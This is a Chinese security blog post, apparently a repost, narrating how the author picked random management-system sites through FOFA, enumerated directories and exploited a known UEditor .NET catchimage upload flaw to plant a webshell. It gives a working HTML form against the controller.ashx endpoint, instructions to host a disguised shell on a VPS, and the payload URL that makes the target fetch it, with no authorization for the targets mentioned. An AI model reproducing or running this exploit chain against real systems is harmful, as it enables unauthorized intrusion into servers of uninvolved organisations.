记一次简单小通杀getshell

admin 2023年11月27日23:52:29评论43 views字数 798阅读2分39秒阅读模式

1、起因:

摸鱼莫得好好的  领导让挖点cnvd

记一次简单小通杀getshell

垃圾水文 轻喷!!

打开fofa 随便找几个用户量差不多的系统:直接搜:xx管理系统,为什么这样搜,因为直接搜“管理系统”有点多,不好选,(这个xx我一般搜某个行业)

随机挑选一名幸运观众

记一次简单小通杀getshell

就它了:

记一次简单小通杀getshell

系统长这样

记一次简单小通杀getshell

试了几个弱口令 无果!

跑一遍目录:

记一次简单小通杀getshell

记一次简单小通杀getshell

跑出来几个目录列表漏洞:

目录列表这个漏洞,说大也不大,说小也不小,但是这个长这样感觉挺严重的。

记一次简单小通杀getshell

记一次简单小通杀getshell

记一次简单小通杀getshell

也算是意料之中:不可能把网站搞得这么弱智,这种情况要么是404,要么是401403,要么就是开发有点问题!!!

接下来就是无聊的翻文件环节,看看有什么未授权的接口

记一次简单小通杀getshell

翻的我眼都酸了,直到在Js文件夹里面找到了希望——ueditor

记一次简单小通杀getshell

记一次简单小通杀getshell

接下来是简单的复现ueditor历史漏洞

长这个样子的一般就是存在漏洞的:

记一次简单小通杀getshell

将下面的代码保存为html

<form action="http://target/content/Js/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"method="POST">

<p>shell addr:<input type="text" name="source[]" /></p >

<input type="submit" value="Submit" /></form>

把你的马改成jpg后缀放到你的VPS

记一次简单小通杀getshell

开启http服务:python2 -m SimpleHTTPServer 7788

在刚才打开的html上输入payloadhttp://VPS/3.jpg?.asp

记一次简单小通杀getshell

提交后会返回文件路径:

记一次简单小通杀getshell

随便有试了几个确定是小通杀:

记一次简单小通杀getshell

记一次简单小通杀getshell

理想很美好,查了一下该公司信息,资本不够5千,不知道能不能收,不知道有没有被提过。

记一次简单小通杀getshell

记一次简单小通杀getshell

总结:搞渗透还是得细心,耐心


原文始发于微信公众号(99Sec):记一次简单小通杀getshell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月27日23:52:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次简单小通杀getshellhttps://cn-sec.com/archives/2243312.html

发表评论

匿名网友 填写信息